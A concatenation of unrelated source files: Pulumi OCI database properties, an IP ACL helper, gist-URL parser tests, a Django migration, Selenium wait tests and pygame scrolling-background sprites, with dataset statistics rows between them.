The Data Guard role of the Autonomous Container Database, if Autonomous Data Guard is enabled.
"""
return pulumi.get(self, "role")
@property
@pulumi.getter(name="rotateKeyTrigger")
def rotate_key_trigger(self) -> pulumi.Output[Optional[bool]]:
"""
(Updatable) An optional property; when its value is flipped, it triggers rotation of the KMS key. It is applicable only to dedicated databases, i.e. where `is_dedicated` is true.
"""
return pulumi.get(self, "rotate_key_trigger")
@property
@pulumi.getter(name="serviceConsoleUrl")
def service_console_url(self) -> pulumi.Output[str]:
"""
The URL of the Service Console for the Autonomous Database.
"""
return pulumi.get(self, "service_console_url")
@property
@pulumi.getter
def source(self) -> pulumi.Output[str]:
"""
The source of the database: Use `NONE` for creating a new Autonomous Database. Use `DATABASE` for creating a new Autonomous Database by cloning an existing Autonomous Database.
"""
return pulumi.get(self, "source")
@property
@pulumi.getter(name="sourceId")
def source_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "source_id")
@property
@pulumi.getter(name="standbyDb")
def standby_db(self) -> pulumi.Output['outputs.AutonomousDatabaseStandbyDb']:
"""
Autonomous Data Guard standby database details.
"""
return pulumi.get(self, "standby_db")
@property
@pulumi.getter(name="standbyWhitelistedIps")
def standby_whitelisted_ips(self) -> pulumi.Output[Sequence[str]]:
"""
(Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
return pulumi.get(self, "standby_whitelisted_ips")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
(Updatable) The current state of the Autonomous Database. Can be set to AVAILABLE or STOPPED.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.
"""
return pulumi.get(self, "subnet_id")
@property
@pulumi.getter(name="switchoverTo")
def switchover_to(self) -> pulumi.Output[Optional[str]]:
"""
It is applicable only when `is_data_guard_enabled` is true. Could be set to `PRIMARY` or `STANDBY`. Default value is `PRIMARY`.
"""
return pulumi.get(self, "switchover_to")
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
System tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "system_tags")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The date and time the Autonomous Database was created.
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeDeletionOfFreeAutonomousDatabase")
def time_deletion_of_free_autonomous_database(self) -> pulumi.Output[str]:
"""
The date and time the Always Free database will be automatically deleted because of inactivity. If the database is in the STOPPED state and without activity until this time, it will be deleted.
"""
return pulumi.get(self, "time_deletion_of_free_autonomous_database")
@property
@pulumi.getter(name="timeMaintenanceBegin")
def time_maintenance_begin(self) -> pulumi.Output[str]:
"""
The date and time when maintenance will begin.
"""
return pulumi.get(self, "time_maintenance_begin")
@property
@pulumi.getter(name="timeMaintenanceEnd")
def time_maintenance_end(self) -> pulumi.Output[str]:
"""
The date and time when maintenance will end.
"""
return pulumi.get(self, "time_maintenance_end")
@property
@pulumi.getter(name="timeOfLastFailover")
def time_of_last_failover(self) -> pulumi.Output[str]:
"""
The timestamp of the last failover operation.
"""
return pulumi.get(self, "time_of_last_failover")
@property
@pulumi.getter(name="timeOfLastRefresh")
def time_of_last_refresh(self) -> pulumi.Output[str]:
"""
The date and time when last refresh happened.
"""
return pulumi.get(self, "time_of_last_refresh")
@property
@pulumi.getter(name="timeOfLastRefreshPoint")
def time_of_last_refresh_point(self) -> pulumi.Output[str]:
"""
The refresh point timestamp (UTC). The refresh point is the time to which the database was most recently refreshed. Data created after the refresh point is not included in the refresh.
"""
return pulumi.get(self, "time_of_last_refresh_point")
@property
@pulumi.getter(name="timeOfLastSwitchover")
def time_of_last_switchover(self) -> pulumi.Output[str]:
"""
The timestamp of the last switchover operation for the Autonomous Database.
"""
return pulumi.get(self, "time_of_last_switchover")
@property
@pulumi.getter(name="timeOfNextRefresh")
def time_of_next_refresh(self) -> pulumi.Output[str]:
"""
The date and time of next refresh.
"""
return pulumi.get(self, "time_of_next_refresh")
@property
@pulumi.getter(name="timeReclamationOfFreeAutonomousDatabase")
def time_reclamation_of_free_autonomous_database(self) -> pulumi.Output[str]:
"""
The date and time the Always Free database will be stopped because of inactivity. If this time is reached without any database activity, the database will automatically be put into the STOPPED state.
"""
return pulumi.get(self, "time_reclamation_of_free_autonomous_database")
@property
@pulumi.getter
def timestamp(self) -> pulumi.Output[str]:
"""
The timestamp specified for the point-in-time clone of the source Autonomous Database. The timestamp must be in the past.
"""
return pulumi.get(self, "timestamp")
@property
@pulumi.getter(name="usedDataStorageSizeInTbs")
def used_data_storage_size_in_tbs(self) -> pulumi.Output[int]:
"""
The amount of storage that has been used, in terabytes.
"""
return pulumi.get(self, "used_data_storage_size_in_tbs")
@property
@pulumi.getter(name="vaultId")
def vault_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the Oracle Cloud Infrastructure [vault](https://docs.cloud.oracle.com/iaas/Content/KeyManagement/Concepts/keyoverview.htm#concepts).
"""
return pulumi.get(self, "vault_id")
@property
@pulumi.getter(name="whitelistedIps")
def whitelisted_ips(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
(Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
return pulumi.get(self, "whitelisted_ips")
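# Only clients whose address matches an ACL entry may connect. A quick local
# membership check over plain-IP and CIDR entries, using only the standard
# library, might look like the sketch below. `ip_allowed` is a hypothetical
# helper; real OCI ACLs may also contain VCN OCID entries, which it skips.

```python
import ipaddress

def ip_allowed(client_ip: str, acl: list) -> bool:
    """Return True if client_ip matches any plain-IP or CIDR entry in the ACL."""
    addr = ipaddress.ip_address(client_ip)
    for entry in acl:
        try:
            # A bare IP parses as a /32 (or /128) network, so both forms work.
            if addr in ipaddress.ip_network(entry, strict=False):
                return True
        except ValueError:
            continue  # skip non-IP entries such as VCN OCIDs
    return False
```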
# --- tests/test_utils.py (repo: Cologler/glink-python, license: MIT) ---
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020~2999 - Cologler <skyoflw@gmail.com>
# ----------
#
# ----------
from glink.provs.gist import parse_gist_url, determine_gist_file
def test_parse_gist_url_fullurl():
assert parse_gist_url('https://gist.github.com/Cologler/17a6dfcb530d53d0b155706b8d657772#file-python-travis-yml') == dict(
user='Cologler',
gist_id='17a6dfcb530d53d0b155706b8d657772',
file='file-python-travis-yml'
)
def test_parse_gist_url_fullurl_without_file():
assert parse_gist_url('https://gist.github.com/Cologler/17a6dfcb530d53d0b155706b8d657772#') == dict(
user='Cologler',
gist_id='17a6dfcb530d53d0b155706b8d657772'
)
assert parse_gist_url('https://gist.github.com/Cologler/17a6dfcb530d53d0b155706b8d657772') == dict(
user='Cologler',
gist_id='17a6dfcb530d53d0b155706b8d657772'
)
def test_parse_gist_url_without_user():
assert parse_gist_url('https://gist.github.com/17a6dfcb530d53d0b155706b8d657772#file-python-travis-yml') == dict(
gist_id='17a6dfcb530d53d0b155706b8d657772',
file='file-python-travis-yml'
)
def test_parse_gist_url_without_user_and_file():
assert parse_gist_url('https://gist.github.com/17a6dfcb530d53d0b155706b8d657772#') == dict(
gist_id='17a6dfcb530d53d0b155706b8d657772'
)
assert parse_gist_url('https://gist.github.com/17a6dfcb530d53d0b155706b8d657772') == dict(
gist_id='17a6dfcb530d53d0b155706b8d657772'
)
def test_parse_gist_url_only_gist_id():
assert parse_gist_url('17a6dfcb530d53d0b155706b8d657772#file-python-travis-yml') == dict(
gist_id='17a6dfcb530d53d0b155706b8d657772',
file='file-python-travis-yml'
)
def test_parse_gist_url_only_gist_id_without_file():
assert parse_gist_url('17a6dfcb530d53d0b155706b8d657772#') == dict(
gist_id='17a6dfcb530d53d0b155706b8d657772'
)
assert parse_gist_url('17a6dfcb530d53d0b155706b8d657772') == dict(
gist_id='17a6dfcb530d53d0b155706b8d657772'
)
def test_guess_gist_file():
assert determine_gist_file('file-python-travis-yml', {'python.travis.yml'}) == 'python.travis.yml'
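These tests pin down the expected parse behaviour. As an illustration only — `parse_gist_url_sketch` and `determine_gist_file_sketch` are hypothetical names, not glink's actual implementation — a regex-based parser satisfying the assertions above could look like:

```python
import re

# Hypothetical sketch, not glink's real code: an optional
# https://gist.github.com/ prefix, an optional user segment, a hex gist id,
# and an optional '#file-...' fragment.
_GIST_RE = re.compile(
    r'^(?:https://gist\.github\.com/(?:(?P<user>[^/#]+)/)?)?'
    r'(?P<gist_id>[0-9a-f]+)'
    r'(?:#(?P<file>.+)?)?$'
)

def parse_gist_url_sketch(url):
    match = _GIST_RE.match(url)
    if match is None:
        return None
    # drop unmatched groups, so a bare trailing '#' yields no 'file' entry
    return {k: v for k, v in match.groupdict().items() if v is not None}

def determine_gist_file_sketch(anchor, file_names):
    # gist HTML anchors are 'file-' plus the file name with non-alphanumerics
    # replaced by '-'; map the anchor back to a real file name
    key = anchor[len('file-'):] if anchor.startswith('file-') else anchor
    for name in file_names:
        if re.sub(r'[^0-9a-zA-Z]', '-', name).lower() == key.lower():
            return name
    return None
```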
| 38.017544 | 126 | 0.733272 | 230 | 2,167 | 6.595652 | 0.16087 | 0.094924 | 0.126566 | 0.10679 | 0.908372 | 0.891233 | 0.804878 | 0.785761 | 0.747528 | 0.597231 | 0 | 0.217625 | 0.141209 | 2,167 | 56 | 127 | 38.696429 | 0.597528 | 0.045224 | 0 | 0.357143 | 0 | 0 | 0.467992 | 0.240543 | 0 | 0 | 0 | 0 | 0.238095 | 1 | 0.166667 | true | 0 | 0.02381 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
68f5625b1537fcda1de7367b1347d9f9d3ab9182 | 7,357 | py | Python | django_core_models/core/migrations/0001_initial.py | ajaniv/django-core-models | 7fde3792de745b5df875e8dc760096f5b10d46ce | [
"MIT"
] | null | null | null | django_core_models/core/migrations/0001_initial.py | ajaniv/django-core-models | 7fde3792de745b5df875e8dc760096f5b10d46ce | [
"MIT"
] | 15 | 2016-04-23T17:18:42.000Z | 2018-09-06T16:32:48.000Z | django_core_models/core/migrations/0001_initial.py | ajaniv/django-core-models | 7fde3792de745b5df875e8dc760096f5b10d46ce | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-05-14 00:19
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.CreateModel(
name='Annotation',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, unique=True)),
('uuid', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False, unique=True)),
('version', models.IntegerField(default=0)),
('enabled', models.BooleanField(default=True)),
('deleted', models.BooleanField(default=False)),
('creation_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
('alias', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('description', models.TextField(blank=True, null=True)),
('name', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('annotation', models.TextField()),
('creation_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_annotation_related_creation_user',
to=settings.AUTH_USER_MODEL)),
('effective_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_annotation_related_effective_user',
to=settings.AUTH_USER_MODEL)),
('site', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_annotation_related_site', to='sites.Site')),
('update_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_annotation_related_update_user',
to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('name',),
'get_latest_by': 'update_time',
'verbose_name_plural': 'Annotations',
'verbose_name': 'Annotation',
'db_table': 'sl_core_annotation',
'abstract': False,
},
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, unique=True)),
('uuid', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False, unique=True)),
('version', models.IntegerField(default=0)),
('enabled', models.BooleanField(default=True)),
('deleted', models.BooleanField(default=False)),
('creation_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
('alias', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('description', models.TextField(blank=True, null=True)),
('name', models.CharField(db_index=True, max_length=255, unique=True)),
('creation_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_category_related_creation_user',
to=settings.AUTH_USER_MODEL)),
('effective_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_category_related_effective_user',
to=settings.AUTH_USER_MODEL)),
('site', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_category_related_site', to='sites.Site')),
('update_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_category_related_update_user',
to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('name',),
'get_latest_by': 'update_time',
'verbose_name_plural': 'Categories',
'verbose_name': 'Category',
'db_table': 'sl_core_category',
'abstract': False,
},
),
migrations.CreateModel(
name='Currency',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, unique=True)),
('uuid', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False, unique=True)),
('version', models.IntegerField(default=0)),
('enabled', models.BooleanField(default=True)),
('deleted', models.BooleanField(default=False)),
('creation_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
('alias', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('description', models.TextField(blank=True, null=True)),
('name', models.CharField(db_index=True, max_length=255, unique=True)),
('iso_code', models.CharField(max_length=3, unique=True)),
('creation_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_currency_related_creation_user',
to=settings.AUTH_USER_MODEL)),
('effective_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_currency_related_effective_user',
to=settings.AUTH_USER_MODEL)),
('site', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_currency_related_site', to='sites.Site')),
('update_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT,
related_name='core_currency_related_update_user',
to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('name',),
'get_latest_by': 'update_time',
'verbose_name_plural': 'Currencies',
'verbose_name': 'Currency',
'db_table': 'sl_core_currency',
'abstract': False,
},
),
]
| 58.388889 | 107 | 0.534457 | 669 | 7,357 | 5.624813 | 0.156951 | 0.029763 | 0.048366 | 0.076003 | 0.842413 | 0.822216 | 0.822216 | 0.822216 | 0.822216 | 0.822216 | 0 | 0.009402 | 0.349463 | 7,357 | 125 | 108 | 58.856 | 0.776849 | 0.009107 | 0 | 0.632479 | 1 | 0 | 0.164128 | 0.057911 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.042735 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ec1878f380525f51b8cc01096f61432cd6ec3a2d | 83 | py | Python | server/app/bgtasks.py | michael0liver/fullstack-fastapi-vuejs-template | a686b7b71dca04f90538d00b350158cb6d7e9db2 | [
"MIT"
] | 15 | 2020-06-14T05:35:05.000Z | 2021-08-01T15:30:38.000Z | server/app/bgtasks.py | michael0liver/fullstack-fastapi-vuejs-template | a686b7b71dca04f90538d00b350158cb6d7e9db2 | [
"MIT"
] | 1 | 2022-02-27T19:32:18.000Z | 2022-02-27T19:32:18.000Z | server/app/bgtasks.py | michael0liver/fullstack-fastapi-vuejs-template | a686b7b71dca04f90538d00b350158cb6d7e9db2 | [
"MIT"
] | 1 | 2021-09-06T03:21:51.000Z | 2021-09-06T03:21:51.000Z | from fastapi.background import BackgroundTasks
def send_signup_email():
    """Placeholder background task; the email-sending logic is not implemented yet."""
    pass
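The imported `BackgroundTasks` is not used yet. As a rough stdlib-only illustration of the pattern it implements — `TaskQueueSketch` is a hypothetical class, not FastAPI's internals — tasks are queued during request handling and executed after the response goes out:

```python
# Minimal sketch of the background-task pattern (assumption: this mirrors the
# intent, not FastAPI's actual implementation): callables are recorded instead
# of being run inline, then executed together later.
class TaskQueueSketch:
    def __init__(self):
        self._tasks = []

    def add_task(self, func, *args, **kwargs):
        # record the callable for later instead of calling it now
        self._tasks.append((func, args, kwargs))

    def run_all(self):
        # run everything that was queued, in order
        for func, args, kwargs in self._tasks:
            func(*args, **kwargs)
```

In a FastAPI endpoint one would declare a `BackgroundTasks` parameter and call `background_tasks.add_task(send_signup_email)`; the framework then runs the task after the response is sent.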
| 13.833333 | 46 | 0.795181 | 10 | 83 | 6.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156627 | 83 | 5 | 47 | 16.6 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
ec5409e6857206881ecc18ab47891ceb7d8e6bcc | 4,493 | py | Python | tests/test_custom_wait_conditions.py | popescunsergiu/pytest-selenium-enhancer | 9966604d5c44621b2ac707fbec278bed7771594a | [
"MIT"
] | 2 | 2021-01-20T02:38:31.000Z | 2021-10-01T11:51:14.000Z | tests/test_custom_wait_conditions.py | popescunsergiu/pytest-selenium-enhancer | 9966604d5c44621b2ac707fbec278bed7771594a | [
"MIT"
] | null | null | null | tests/test_custom_wait_conditions.py | popescunsergiu/pytest-selenium-enhancer | 9966604d5c44621b2ac707fbec278bed7771594a | [
"MIT"
] | null | null | null | # pylint: disable=import-outside-toplevel
# pylint: disable=no-member
# pylint: disable=too-many-arguments
import time
import pytest
from pytest_selenium_enhancer import CustomWait
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
class TestCustomWaitConditions:
def test_wait_for_element_present(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
wait.wait_for_element_present(value='//h1[.="Examples"]', timeout=1)
try:
wait.wait_for_element_present(value='//h1[.="Examples dummy"]', timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
def test_wait_for_element_visible(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
wait.wait_for_element_visible(value='//h1[.="Examples"]', timeout=1)
try:
wait.wait_for_element_visible(value='//h1[.="Examples dummy"]', timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
def test_wait_for_element_clickable(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
wait.wait_for_element_clickable(value='//a[contains(@href,"https://github.com/twbs/bootstrap/archive/v4")]'
, timeout=1)
        try:
            # deliberately non-matching href so this wait must time out
            wait.wait_for_element_clickable(value='//a[contains(@href,"https://github.com/twbs/bootstrap/archive/v4-dummy")]'
                                            , timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
def test_wait_for_element_not_visible(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
wait.wait_for_element_not_visible(value='//h1[.="Examples dummy"]', timeout=1)
        try:
            # the heading is visible, so waiting for it to disappear must time out
            wait.wait_for_element_not_visible(value='//h1[.="Examples"]', timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
def test_wait_for_the_attribute_value(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
title = driver.find_element(By.XPATH, '//h1[.="Examples"]')
wait.wait_for_the_attribute_value(title, 'class', 'bd-title mt-0', timeout=1)
try:
wait.wait_for_the_attribute_value(title, 'class', 'bd-title', timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
def test_wait_for_the_attribute_contain_value(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
title = driver.find_element(By.XPATH, '//h1[.="Examples"]')
wait.wait_for_the_attribute_contain_value(title, 'class', 'bd-title', timeout=1)
try:
wait.wait_for_the_attribute_contain_value(title, 'class', 'bs-title', timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
def test_wait_for_child_element_visible(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
elem = driver.find_element(By.XPATH, '//main')
wait.wait_for_child_element_visible(elem, value='./h2[@id="custom-components"]', timeout=1)
try:
wait.wait_for_child_element_visible(elem, value='./h3[id="custom-components"]', timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
def test_wait_for_child_element_not_visible(self, driver, base_url):
driver.get('%s%s' % (base_url, '/docs/4.4/examples/'))
wait = CustomWait(driver)
elem = driver.find_element(By.XPATH, '//main')
wait.wait_for_child_element_not_visible(elem, value='./h3[@id="custom-components"]', timeout=1)
try:
wait.wait_for_child_element_not_visible(elem, value='./h2[id="custom-components"]', timeout=1)
except TimeoutException as e:
print(e)
except Exception as e:
raise e
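All of these helpers share the same poll-until-deadline shape. Stripped of Selenium, the underlying pattern — a sketch with hypothetical names (`wait_until`, `WaitTimeout`), not `CustomWait`'s actual code — is:

```python
import time

class WaitTimeout(Exception):
    """Raised when the condition does not hold before the deadline."""

def wait_until(condition, timeout=1.0, interval=0.1):
    # poll `condition` until it returns a truthy value or `timeout` elapses
    deadline = time.monotonic() + timeout
    while True:
        result = condition()
        if result:
            return result
        if time.monotonic() >= deadline:
            raise WaitTimeout("condition not met within %.1fs" % timeout)
        time.sleep(interval)
```

Each `wait_for_*` method is then just this loop with a Selenium lookup (presence, visibility, attribute value) as the condition.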
| 37.756303 | 119 | 0.620076 | 574 | 4,493 | 4.641115 | 0.141115 | 0.063063 | 0.066066 | 0.042042 | 0.893018 | 0.884009 | 0.881381 | 0.867492 | 0.853979 | 0.79955 | 0 | 0.013934 | 0.249277 | 4,493 | 118 | 120 | 38.076271 | 0.775867 | 0.022257 | 0 | 0.717391 | 0 | 0.021739 | 0.151059 | 0.025974 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.054348 | 0 | 0.152174 | 0.086957 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ec5890573ee71d7f094c225dc0d4a5de5f01820a | 4,569 | py | Python | data/components/backgrounds.py | arnoldochavez/flappy-fish | 9814bb12fb91dcefae4d8801a2edd85c3fbe493c | [
"MIT"
] | null | null | null | data/components/backgrounds.py | arnoldochavez/flappy-fish | 9814bb12fb91dcefae4d8801a2edd85c3fbe493c | [
"MIT"
] | null | null | null | data/components/backgrounds.py | arnoldochavez/flappy-fish | 9814bb12fb91dcefae4d8801a2edd85c3fbe493c | [
"MIT"
] | null | null | null | __author__ = "arnoldochavez"
import pygame
from .. import constants as const
from .. import tools
from .. import resources as res
class SandMiddle:
_instances = []
def __init__( self, x, y ):
self.x = x
self.y = y
self.width = 256
self.height = 46
self.name = "Sand Middle"
self.offsetX = 0
self.offsetY = 46
self.destroy = False
self.angle = 0
self.depth = -1
self.rect = pygame.Rect(self.x, self.y, self.width, self.height)
self.control = None
self.image = res.IMAGE["SAND_MID"]
self.instanceID = len(type(self)._instances)
type(self)._instances.append(self)
def destroyed( self ):
type(self)._instances.pop(type(self)._instances.index(self))
def update( self ):
if self.control.gameState == const.GAMESTATE_RUN or self.control.gameState == const.GAMESTATE_START:
self.x -= 2
if self.x < -self.width:
self.x += len(type(self)._instances) * 256
self.rect = pygame.Rect(self.x, self.y, self.width, self.height)
def draw( self, surface ):
#tempSurf = pygame.Surface((self.image.get_width() * 4, self.image.get_height() * 4), pygame.SRCALPHA)
#tempSurf.blit(self.image, ((tempSurf.get_width()/2) - self.offsetX, (tempSurf.get_height()/2) - self.offsetY))
#tempSurf = pygame.transform.rotate(tempSurf, self.angle)
surface.blit(self.image, (self.x - self.offsetX, self.y - self.offsetY))
#DEBUG DRAW
if const.DEBUG_MODE:
pygame.draw.rect(surface, (255,0,0), self.rect, 1)
pygame.draw.line(surface, (0,0,255), (self.x-16, self.y), (self.x+16, self.y),1)
pygame.draw.line(surface, (0,0,255), (self.x, self.y-16), (self.x, self.y+16),1)
class SandBack:
_instances = []
def __init__( self, x, y ):
self.x = x
self.y = y
self.width = 256
self.height = 65
self.name = "Sand Back"
self.offsetX = 0
self.offsetY = 65
self.destroy = False
self.angle = 0
self.depth = -2
self.rect = pygame.Rect(self.x, self.y, self.width, self.height)
self.control = None
self.image = res.IMAGE["SAND_BACK"]
self.instanceID = len(type(self)._instances)
type(self)._instances.append(self)
def destroyed( self ):
type(self)._instances.pop(type(self)._instances.index(self))
def update( self ):
if self.control.gameState == const.GAMESTATE_RUN or self.control.gameState == const.GAMESTATE_START:
self.x -= 1
if self.x < -self.width:
self.x += len(type(self)._instances) * 256
self.rect = pygame.Rect(self.x, self.y, self.width, self.height)
def draw( self, surface ):
#tempSurf = pygame.Surface((self.image.get_width() * 4, self.image.get_height() * 4), pygame.SRCALPHA)
#tempSurf.blit(self.image, ((tempSurf.get_width()/2) - self.offsetX, (tempSurf.get_height()/2) - self.offsetY))
#tempSurf = pygame.transform.rotate(tempSurf, self.angle)
surface.blit(self.image, (self.x - self.offsetX, self.y - self.offsetY))
#DEBUG DRAW
if const.DEBUG_MODE:
pygame.draw.rect(surface, (255,0,0), self.rect, 1)
pygame.draw.line(surface, (0,0,255), (self.x-16, self.y), (self.x+16, self.y),1)
pygame.draw.line(surface, (0,0,255), (self.x, self.y-16), (self.x, self.y+16),1)
class SandFront:
_instances = []
def __init__( self, x, y ):
self.x = x
self.y = y
self.width = 256
self.height = 24
        self.name = "Sand Front"
self.offsetX = 0
self.offsetY = 24
self.destroy = False
self.angle = 0
self.depth = 2
self.rect = pygame.Rect(self.x, self.y, self.width, self.height)
self.control = None
self.image = res.IMAGE["SAND_FRONT"]
self.instanceID = len(type(self)._instances)
type(self)._instances.append(self)
def destroyed( self ):
type(self)._instances.pop(type(self)._instances.index(self))
def update( self ):
if self.control.gameState == const.GAMESTATE_RUN or self.control.gameState == const.GAMESTATE_START:
self.x -= 2.5
if self.x < -self.width:
self.x += len(type(self)._instances) * 256
self.rect = pygame.Rect(self.x, self.y, self.width, self.height)
def draw( self, surface ):
#tempSurf = pygame.Surface((self.image.get_width() * 4, self.image.get_height() * 4), pygame.SRCALPHA)
#tempSurf.blit(self.image, ((tempSurf.get_width()/2) - self.offsetX, (tempSurf.get_height()/2) - self.offsetY))
#tempSurf = pygame.transform.rotate(tempSurf, self.angle)
surface.blit(self.image, (self.x - self.offsetX, self.y - self.offsetY))
#DEBUG DRAW
if const.DEBUG_MODE:
pygame.draw.rect(surface, (255,0,0), self.rect, 1)
pygame.draw.line(surface, (0,0,255), (self.x-16, self.y), (self.x+16, self.y),1)
pygame.draw.line(surface, (0,0,255), (self.x, self.y-16), (self.x, self.y+16),1)
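The three layers differ only in image, depth, and scroll speed; the wrap-around rule their `update()` methods all repeat can be isolated as a pure function (`scroll_x` is a hypothetical helper for illustration, not part of the game code):

```python
def scroll_x(x, speed, tile_width, n_tiles):
    # move the tile left and, once it has scrolled fully off-screen, wrap it
    # to the right end of the strip of n_tiles tiles, as each layer does
    x -= speed
    if x < -tile_width:
        x += n_tiles * tile_width
    return x
```

With three 256-pixel tiles per layer, a tile leaving the left edge reappears 768 pixels to the right, which is what keeps the parallax strips seamless.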
